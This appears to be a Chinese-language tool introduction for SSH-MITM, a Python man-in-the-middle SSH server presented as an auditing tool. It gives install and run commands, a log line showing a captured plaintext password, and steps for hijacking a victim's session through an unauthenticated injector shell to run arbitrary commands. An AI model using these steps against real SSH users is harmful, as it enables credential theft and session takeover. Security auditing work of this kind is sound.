SSH-MITM:支持公钥认证&会话劫持和文件篡改的安全审计MITM服务器
SSH-MITM-拦截SSH流量
SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。
SSH-MITM安装
在使用任何软件包之前,我们都需要进行正确的安装。如需安装SSH-MITM,我们只需要在设备上打开命令行终端,然后运行下列命令即可:
$ pip install ssh-mitm工具使用
SSH-MITM的使用非常简单,如果需要密码认证或会话劫持,只需要开启拦截MITM-SSH服务器即可。打开命令行终端,然后运行下列命令:
$ ssh-mitm --remote-host 192.168.0.x接下来,我们尝试跟SSH-MITM服务器建立连接。SSH-MITM服务器会监听10022端口:
$ ssh -p 10022 user@proxyserver此时,我们将会看到凭证信息在日志中输出:
2021-01-01 11:38:26,098 [INFO] ?Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None会话劫持
获取明文凭证信息仅仅只是SSH-MITM的其中一个功能而已,当客户端成功连接之后,SSH-MITM会开启一个新的服务器,并用于会话劫持:
2021-01-01 11:42:43,699 [INFO] ?created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1在劫持会话的时候,我们可以选择自己喜欢的SSH客户端。需要注意的是,这个连接不需要任何身份验证:
$ ssh -p 34463 127.0.0.1建立连接之后,你的会话只会通过最新的响应信息来更新,但是我们仍然可以执行任意命令。
接下来,我们就可以在劫持的会话或原始会话中尝试执行某些命令了。
命令的执行结果将输出显示在两个会话中。
项目地址
SSH-MITM:【GitHub传送门】